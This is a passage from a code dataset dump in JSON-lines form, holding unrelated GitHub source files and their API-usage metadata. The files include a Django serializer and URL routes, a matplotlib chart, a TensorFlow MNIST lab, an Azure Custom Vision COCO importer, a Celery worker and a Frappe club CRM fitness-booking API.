"folium.Figure", "line_number": 123, "usage_type": "call"}, {"api_name": "folium.Element", "line_number": 129, "usage_type": "call"}, {"api_name": "folium.Element", "line_number": 130, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "38197084093", "text": "\nfrom rest_framework.serializers import ModelSerializer\n\nfrom positions.models import PositionPing\n\nclass PositionPingSerializer(ModelSerializer):\n class Meta:\n model = PositionPing\n fields = [\n 'latitude', 'longitude', 'altitude', \n 'accuracy', 'altitude_accuracy', 'heading', \n 'speed', 'timestamp', 'logged_at'\n ]\n", "repo_name": "thedejijoseph/touchdown", "sub_path": "positions/serializers.py", "file_name": "serializers.py", "file_ext": "py", "file_size_in_byte": 374, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "rest_framework.serializers.ModelSerializer", "line_number": 6, "usage_type": "name"}, {"api_name": "positions.models.PositionPing", "line_number": 8, "usage_type": "name"}]} +{"seq_id": "27364467545", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom pkg import *\nplt.figure(figsize=(8,6))\ngrade = ('before 2010','2010','2011','2012')\nx_pos = np.arange(len(grade))\nperformance = [4.59,23.85,32.11,39.45]\n\nret = plt.bar(x_pos,performance,0.35,color='b',align='center',alpha=0.8)\nplt.xticks(x_pos,grade)\nplt.ylabel('percentage (%)')\nplt.title('The percentage of 
grade')\nautolabel(ret)\nplt.show()\n", "repo_name": "daozl/james", "sub_path": "code/bar/grade.py", "file_name": "grade.py", "file_ext": "py", "file_size_in_byte": 446, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "matplotlib.pyplot.figure", "line_number": 7, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 7, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 12, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 13, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}]} +{"seq_id": "29128693179", "text": "import json\n\nfrom graphbrain import hgraph\n\n\ndef run(args):\n print('exporting hypergraph...')\n hg = hgraph(args.hg)\n n = 0\n with open(args.outfile, 'w') as f:\n for edge, attributes in hg.all_attributes():\n row = [edge.to_str(), attributes]\n f.write('{}\\n'.format(\n json.dumps(row, ensure_ascii=False)))\n n += 1\n print('{} edges exported.'.format(n))\n", "repo_name": "codeaudit/graphbrain", "sub_path": "graphbrain/commands/export.py", "file_name": "export.py", "file_ext": "py", "file_size_in_byte": 420, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "53", "api": [{"api_name": "graphbrain.hgraph", "line_number": 8, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}]} +{"seq_id": "17416543573", "text": "from .integration import (\n get_category_id_to_tag_id_dictionary,\n image_annotations_to_region,\n)\nfrom .azure_blob import download_json, get_container_sas_token\nfrom tqdm import tqdm\nfrom azure.cognitiveservices.vision.customvision.training.models import (\n ImageUrlCreateEntry,\n)\n\n\ndef import_coco_to_custom_vision(\n custom_vision_client,\n custom_vision_project,\n blob_container_client,\n storage_path,\n coco_file_name,\n):\n # Read coco dataset definition\n file_name = coco_file_name\n if storage_path is not None and len(storage_path) > 0:\n file_name = f\"{storage_path}{coco_file_name}\"\n coco_dataset = download_json(blob_container_client, file_name)\n\n category_id_to_tag_id_dictionary = get_category_id_to_tag_id_dictionary(\n coco_dataset, custom_vision_client, custom_vision_project\n )\n\n container_sas_token = get_container_sas_token(blob_container_client)\n\n images_to_upload = []\n for image in tqdm(\n coco_dataset[\"images\"],\n ascii=True,\n desc=\"Preparing coco images\",\n ):\n image_url = f\"{image['coco_url']}?{container_sas_token}\"\n regions = image_annotations_to_region(\n coco_dataset[\"annotations\"], image, category_id_to_tag_id_dictionary\n )\n images_to_upload.append(ImageUrlCreateEntry(url=image_url, regions=regions))\n\n custom_vision_client.upload_images_from_url(custom_vision_project, images_to_upload)\n", "repo_name": 
"rndazurescript/Coco2CustomVision", "sub_path": "src/coco2customvision/import_coco.py", "file_name": "import_coco.py", "file_ext": "py", "file_size_in_byte": 1442, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "azure_blob.download_json", "line_number": 23, "usage_type": "call"}, {"api_name": "integration.get_category_id_to_tag_id_dictionary", "line_number": 25, "usage_type": "call"}, {"api_name": "azure_blob.get_container_sas_token", "line_number": 29, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 32, "usage_type": "call"}, {"api_name": "integration.image_annotations_to_region", "line_number": 38, "usage_type": "call"}, {"api_name": "azure.cognitiveservices.vision.customvision.training.models.ImageUrlCreateEntry", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "7053299679", "text": "# Lab 9-MNIST\n# Made by: Jinmin Goh\n# Date: 20200306\n\n# MNIST dataset wide deep NN model with tensorboard\n# Acc: 94.2%\n\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport random\ntf.set_random_seed(777) # for reproducibility\nfrom tensorflow.examples.tutorials.mnist import input_data\n# Check out https://www.tensorflow.org/get_started/mnist/beginners for\n# more information about the mnist dataset\nmnist = input_data.read_data_sets(\"MNIST_data/\", one_hot=True)\n\nnb_classes = 10\n#MNIST_size = 784\n#hidden_size = 20\n\nX = tf.placeholder(tf.float32, [None, 784])\nY = tf.placeholder(tf.float32, [None, nb_classes])\n\n# layer 1: weight number same with MNIST_size\nwith tf.name_scope(\"Layer1\"):\n W1 = tf.Variable(tf.random_normal([784, 128]), name='weight1')\n b1 = tf.Variable(tf.random_normal([128]), name='bias1')\n layer1 = tf.sigmoid(tf.matmul(X, W1) + b1)\n # histogram\n tf.summary.histogram(\"W1\", W1)\n tf.summary.histogram(\"b1\", b1)\n tf.summary.histogram(\"Layer1\", layer1)\n# layer 2: hidden layer\nwith tf.name_scope(\"Layer2\"):\n W2 = tf.Variable(tf.random_normal([128, 32]), name='weight2')\n b2 = tf.Variable(tf.random_normal([32]), name='bias2')\n layer2 = tf.sigmoid(tf.matmul(layer1, W2) + b2)\n tf.summary.histogram(\"W2\", W2)\n tf.summary.histogram(\"b2\", b2)\n tf.summary.histogram(\"Layer2\", layer2)\n# layer 3: hidden layer\nwith tf.name_scope(\"Layer3\"):\n W3 = tf.Variable(tf.random_normal([32, 16]), name='weight3')\n b3 = tf.Variable(tf.random_normal([16]), name='bias3')\n layer3 = tf.sigmoid(tf.matmul(layer2, W3) + b3)\n tf.summary.histogram(\"W3\", W3)\n tf.summary.histogram(\"b3\", b3)\n tf.summary.histogram(\"Layer3\", layer3)\n# layer 4: 10 classifications\nwith tf.name_scope(\"Layer4\"):\n W4 = tf.Variable(tf.random_normal([16, nb_classes]), name='weight4')\n b4 = tf.Variable(tf.random_normal([nb_classes]), name='bias4')\n hypothesis = tf.nn.softmax(tf.matmul(layer3, W4) + b4)\n tf.summary.histogram(\"W3\", W4)\n tf.summary.histogram(\"b3\", b4)\n tf.summary.histogram(\"Hypothesis\", hypothesis)\n\n# Cross entropy\nwith tf.name_scope(\"Cost\"):\n cost = tf.reduce_mean(-tf.reduce_sum(Y * tf.log(hypothesis), axis=1))\n tf.summary.scalar(\"Cost\", cost)\nwith tf.name_scope(\"Train\"):\n train = tf.train.GradientDescentOptimizer(learning_rate = 1).minimize(cost)\n\n# Test model\nis_correct = tf.equal(tf.argmax(hypothesis, 1), tf.argmax(Y, 1))\n# Calculate accuracy\naccuracy = tf.reduce_mean(tf.cast(is_correct, tf.float32))\ntf.summary.scalar(\"Accuracy\", accuracy)\n\n# parameters\nnum_epochs = 15 # training count of entinre training data\nbatch_size = 100 
# splitting size of whole dataset\nnum_iterations = int(mnist.train.num_examples / batch_size)\n\nwith tf.Session() as sess:\n # Initialize TensorFlow variables\n merged_summary = tf.summary.merge_all()\n writer = tf.summary.FileWriter(\"./logs/MNIST\")\n writer.add_graph(sess.graph)\n sess.run(tf.global_variables_initializer())\n # Training cycle\n for epoch in range(num_epochs):\n avg_cost = 0\n for i in range(num_iterations):\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n _, summary, cost_val = sess.run([train, merged_summary, cost], feed_dict={X: batch_xs, Y: batch_ys})\n avg_cost += cost_val / num_iterations\n writer.add_summary(summary, global_step = i + epoch * num_iterations)\n print(\"Epoch: {:04d}, Cost: {:.9f}\".format(epoch + 1, avg_cost))\n print(\"Learning finished\")\n # Test the model using test sets\n print(\n \"Accuracy: \",\n accuracy.eval(\n session=sess, feed_dict={X: mnist.test.images, Y: mnist.test.labels}\n ),\n )\n # Get one and predict\n r = random.randint(0, mnist.test.num_examples - 1)\n print(\"Label: \", sess.run(tf.argmax(mnist.test.labels[r : r + 1], 1)))\n print(\n \"Prediction: \",\n sess.run(tf.argmax(hypothesis, 1), feed_dict={X: mnist.test.images[r : r + 1]}),\n )\n plt.imshow(\n mnist.test.images[r : r + 1].reshape(28, 28),\n cmap=\"Greys\",\n interpolation=\"nearest\",\n )\n plt.show()\n\n", "repo_name": "Jinmin-Goh/DeepLearningPractice", "sub_path": "Lab/Lab9/Lab9-MNIST.py", "file_name": "Lab9-MNIST.py", "file_ext": "py", "file_size_in_byte": 4128, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "tensorflow.set_random_seed", "line_number": 11, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data.read_data_sets", "line_number": 15, "usage_type": "call"}, {"api_name": "tensorflow.examples.tutorials.mnist.input_data", "line_number": 15, "usage_type": "name"}, {"api_name": "tensorflow.placeholder", "line_number": 21, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 21, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 22, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 25, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 27, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 28, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", 
"line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 38, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 40, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 40, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 42, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.sigmoid", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 45, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 46, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.Variable", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.nn.softmax", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 54, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 55, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 55, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.log", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.summary.scalar", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 61, "usage_type": "attribute"}, 
{"api_name": "tensorflow.name_scope", "line_number": 62, "usage_type": "call"}, {"api_name": "tensorflow.train.GradientDescentOptimizer", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.equal", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 68, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 68, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.Session", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.summary.merge_all", "line_number": 78, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 78, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 81, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}]} +{"seq_id": "14127294857", "text": "from django import views\nfrom django.urls import include, path\nfrom . import views\n\nurlpatterns = [\n path('',views.index, name='index'), #uses \"from . 
import views\"\n path('login/',views.login, name='login'),\n path('register/',views.register, name='register'),\n path('products/',views.products, name='products'),\n path('single/',views.single, name='single'),\n path('add-to-cart/',views.add_to_cart, name='add-to-cart'),\n path('cart/',views.cart, name='cart'),\n path('delete-cart/',views.delete_cart,name='delete-cart'),\n path('checkout/',views.checkout,name='checkout'),\n path('success/',views.success,name='success'),\n]\n", "repo_name": "ankitpatelcs/EcomDjangoProject", "sub_path": "myapp/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 669, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.views.index", "line_number": 6, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.views.login", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 7, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.views.register", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 8, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.views.products", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.views.single", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 10, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.views.add_to_cart", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 11, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.views.cart", "line_number": 12, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 12, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.views.delete_cart", "line_number": 13, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 13, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.views.checkout", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.views.success", "line_number": 15, "usage_type": "attribute"}, {"api_name": "django.views", "line_number": 15, "usage_type": "name"}]} +{"seq_id": "75297970408", "text": "import os\nimport importlib\nimport typing as t\n\nimport numpy as np\nfrom celery import Celery, states\nfrom celery.exceptions import Ignore\n\n\ncelery = Celery(__name__)\nREDIS_URL = \"redis://{host}:{port}/0\".format(\n host=os.getenv('REDIS_HOST', 'localhost'),\n port=os.getenv('REDIS_PORT', '6379')\n)\ncelery.conf.broker_url = REDIS_URL\ncelery.conf.result_backend = REDIS_URL\n\n\n@celery.task(bind=True, name='tasks.vectorize_text')\ndef vectorize_text(self, text: str) 
-> t.List[float]:\n # Lazy import!\n # If TextVectorizer is imported globally,\n # you shuold install large dependencies (like torch) to FastAPI container. \n text_vectorizer = importlib.import_module('src.ml.text_vectorizer')\n\n text = text[:256] if len(text) >= 256 else text\n try:\n res = text_vectorizer.TextVectorizer.vectorize(text)\n if isinstance(res, np.ndarray):\n res = res.tolist()\n return res\n except Exception as e:\n self.update_state(\n state = states.FAILURE,\n meta = e\n )\n raise Ignore()\n ", "repo_name": "fyk7/text-vectorizer-k8s", "sub_path": "src/worker/worker.py", "file_name": "worker.py", "file_ext": "py", "file_size_in_byte": 1062, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "celery.Celery", "line_number": 10, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "celery.conf", "line_number": 15, "usage_type": "attribute"}, {"api_name": "celery.conf", "line_number": 16, "usage_type": "attribute"}, {"api_name": "importlib.import_module", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 29, "usage_type": "attribute"}, {"api_name": "celery.states.FAILURE", "line_number": 34, "usage_type": "attribute"}, {"api_name": "celery.states", "line_number": 34, "usage_type": "name"}, {"api_name": "celery.exceptions.Ignore", "line_number": 37, "usage_type": "call"}, {"api_name": "celery.task", "line_number": 19, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 20, "usage_type": "attribute"}]} +{"seq_id": "33956342074", "text": "import frappe\nfrom frappe.website.utils import is_signup_enabled\nfrom frappe.utils import escape_html\nfrom frappe.utils import getdate, get_time, flt, now_datetime\nfrom club_crm.club_crm.doctype.fitness_training_appointment.fitness_training_appointment import cancel_appointment_online\nfrom datetime import datetime, timedelta, date, time\nfrom frappe import throw, msgprint, _\nfrom club_crm.api.wallet import get_balance\n\n@frappe.whitelist()\ndef get_fitness_category(client_id):\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n if not client.status == \"Disabled\":\n doc = frappe.get_all('Fitness Training Request', filters={'client_id':client.name, 'request_status':['in', {'Pending','Scheduled'}]}, fields=['*'])\n if doc:\n for doc_1 in doc:\n if doc_1.request_status==\"Pending\":\n frappe.response[\"message\"] = {\n \"Status\":0,\n \"Status Message\": \"A pending request exists\",\n \"Document ID\" : doc_1.name\n }\n else:\n schedule=frappe.get_list('Fitness Training Trainer Scheduler', filters={'parent':doc_1.name,'parentfield':'table_schedule'}, fields=['day','date','from_time','to_time'], order_by=\"date asc\")\n \n frappe.response[\"message\"] = {\n \"Status\":1,\n \"disabled\": 0,\n \"Status Message\": \"Training has been scheduled\",\n \"Document ID\": doc_1.name,\n \"rate\": doc_1.price,\n \"package_name\": doc_1.fitness_package,\n \"Number of Sessions\": doc_1.number_of_sessions,\n \"Schedule\": schedule\n }\n else:\n fitness_category = frappe.get_all('Fitness Services', filters={'on_app': 1}, fields=['fitness_name','image'])\n fitness_item = []\n for item in fitness_category:\n fitness_item.append({\n \"category_name\" : item.fitness_name,\n \"category_image\" : item.image\n })\n frappe.response[\"message\"] = {\n \"Status\":2,\n \"disabled\": 0,\n \"Fitness 
Categories\": fitness_item\n }\n else:\n frappe.response[\"message\"] = {\n \"Status\":3,\n \"disabled\": 1\n }\n\n@frappe.whitelist()\ndef get_fitness_package(fitness_category):\n fit_category = frappe.get_doc('Fitness Services', fitness_category)\n all_fitness_package = frappe.get_all('Club Packages', filters={'on_app': 1, 'package_type': 'Fitness'})\n packages = []\n for item in all_fitness_package:\n single_package = frappe.get_doc('Club Packages', item.name)\n for package in single_package.package_table:\n if package.service_name == fitness_category:\n sessions = int(package.no_of_sessions/4)\n if sessions == 0:\n sessions = 1\n validity = int(package.validity // (24 * 3600))\n packages.append({\n \"name\": item.name,\n \"duration\": int(fit_category.duration),\n \"no_of_session\": package.no_of_sessions,\n \"validity\": validity,\n \"sessions_per_week\": sessions,\n \"price\": package.price,\n \"fitness_category\": fitness_category\n })\n \n frappe.response[\"message\"] = {\n \"Fitness Categories\": packages\n }\n\n@frappe.whitelist()\ndef get_trainer(fitness_package,client_id):\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n club_package = frappe.get_doc('Club Packages', fitness_package)\n for package in club_package.package_table:\n fit_trainer = frappe.get_all('Fitness Services Assignment', filters={'fitness_package': package.service_name, 'on_app':1}, fields=['name','parent','parenttype','parentfield','gender_preference'])\n trainers = []\n for trainer in fit_trainer:\n doc_1 = frappe.get_doc('Service Staff', trainer.parent)\n if doc_1.on_app == 1:\n if trainer.gender_preference == \"Same Gender\":\n if doc_1.gender == client.gender:\n trainers.append({\n 'Trainer': doc_1.display_name,\n 'Description': doc_1.description,\n 'Image': doc_1.image,\n 'Gender': doc_1.gender\n })\n elif trainer.gender_preference == \"No Preference\":\n trainers.append({\n \"Trainer\": doc_1.display_name,\n \"Description\": doc_1.description,\n \"Image\": doc_1.image,\n \"Gender\": doc_1.gender\n })\n return trainers\n\n@frappe.whitelist()\ndef get_pt_appointments():\n rating_point = -1\n disabled = 0\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n if client.status == \"Disabled\":\n disabled = 1\n time = frappe.get_doc('Fitness Training Settings')\n\n sessions = []\n client_session_list = frappe.get_all('Client Sessions', filters={'client_id': client.name, 'session_status': 'Active', 'package_type': 'Fitness'}, order_by=\"expiry_date asc\")\n if client_session_list:\n for client_session in client_session_list:\n client_session_doc = frappe.get_doc('Client Sessions', client_session.name)\n sessions.append({\n 'package_name': client_session_doc.package_name,\n 'expiry_date' : client_session_doc.expiry_date,\n 'used_sessions': client_session_doc.used_sessions,\n 'remaining_sessions': client_session_doc.remaining_sessions\n })\n\n details=[]\n pt_list = frappe.get_all('Fitness Training Appointment', filters={'client_id':client.name}, fields=['name','start_time'], order_by=\"appointment_date asc\")\n if pt_list:\n for pt in pt_list:\n pt_doc = frappe.get_doc('Fitness Training Appointment', pt.name)\n cancel_time = pt_doc.start_time - timedelta(seconds=int(time.pt_cancellation_time))\n start_date = pt_doc.start_time.date()\n\n rating_list = frappe.get_all('Rating', filters={'document_id':pt.name}, fields=['rating_point'])\n if rating_list:\n for rating in rating_list:\n rating_point = rating.rating_point\n details.append({\n \"name\": pt_doc.name,\n \"date\": 
start_date,\n \"client_id\" : pt_doc.client_id,\n \"client_name\": pt_doc.client_name,\n \"package_name\": pt_doc.fitness_service,\n \"trainer_name\": pt_doc.service_staff,\n \"status\": pt_doc.appointment_status,\n \"start_time\": pt_doc.start_time,\n \"end_time\": pt_doc.end_time,\n \"payment_status\": pt_doc.payment_status,\n \"cancellation_time\" : cancel_time,\n \"rating\": rating_point\n })\n\n frappe.response[\"message\"] = {\n \"disabled\": disabled,\n \"pt_appointments\": details,\n \"packages\": sessions\n }\n\n@frappe.whitelist()\ndef get_appointments(client_id):\n client = frappe.db.get(\"Client\", {\"email\": frappe.session.user})\n doc = frappe.get_all('Fitness Training Appointment', filters={'client_id':client.name}, fields=['name','booking_date','client_id','client_name','fitness_service','service_staff','appointment_status','start_time','end_time','payment_status'], order_by=\"appointment_date asc\")\n details=[]\n if doc:\n for rating in doc:\n # start_time = datetime.strftime(rating.start_time, \"%H:%M:%S\")\n # end_time = datetime.strftime(rating.end_time, \"%H:%M:%S\")\n start_date = rating.start_time.date()\n\n rate=frappe.get_all('Rating', filters={'document_id':rating.name}, fields=['rating_point'])\n #cancel_time = rating.start_time - timedelta(seconds=int(time.spa_cancel_time))\n if rate:\n rate=rate[0]\n details.append({\n 'pt_appointment': {\n \"name\": rating.name,\n \"date\": start_date,\n \"client_id\" : rating.client_id,\n \"client_name\": rating.client_name,\n \"package_name\": rating.fitness_service,\n \"trainer_name\": rating.service_staff,\n \"status\": rating.appointment_status,\n \"start_time\": rating.start_time,\n \"end_time\": rating.end_time,\n \"payment_status\": rating.payment_status\n },\n 'Rating': rate.rating_point,\n })\n else:\n details.append({\n 'pt_appointment': {\n \"name\": rating.name,\n \"date\": start_date,\n \"client_id\" : rating.client_id,\n \"client_name\": rating.client_name,\n \"package_name\": rating.fitness_service,\n \"trainer_name\": rating.service_staff,\n \"status\": rating.appointment_status,\n \"start_time\": rating.start_time,\n \"end_time\": rating.end_time,\n \"payment_status\": rating.payment_status\n },\n 'Rating': -1,\n })\n return details\n\n@frappe.whitelist()\ndef cancel_request(doc_id):\n doc = frappe.get_doc('Fitness Training Request', doc_id)\n frappe.db.set_value('Fitness Training Request', doc_id, {\n 'request_status': 'Cancelled',\n 'docstatus': 2\n })\n doc.reload()\n frappe.response[\"message\"] = {\n \"status\": 1,\n \"status_message\": \"Fitness Training Request has been cancelled\"\n }\n # else:\n # frappe.response[\"message\"] = {\n # \"status\": 0,\n # \"status_message\": \"Fitness Training Appointmnent already cancelled\"\n # }\n\n@frappe.whitelist()\ndef cancel_session(appointment_id):\n doc = cancel_appointment_online(appointment_id)\n if doc == 1:\n frappe.response[\"message\"] = {\n \"status\": 1,\n \"status_message\": \"Fitness Training Appointment has been cancelled\"\n }\n else:\n frappe.response[\"message\"] = {\n \"status\": 0,\n \"status_message\": \"Fitness Training Appointment already cancelled\"\n }\n\n@frappe.whitelist()\ndef proceed_payment(client_id,doc_id, payment_method):\n doc = frappe.get_doc('Fitness Training Request', doc_id)\n # doc.payment_method= payment_method\n # doc.save()\n # cart = add_cart_from_pt_online(doc.client_id, doc.name)\n wallet= get_balance()\n frappe.response[\"message\"] = {\n \"status\": 1,\n \"document_name\": doc.name,\n \"wallet_balance\": wallet\n 
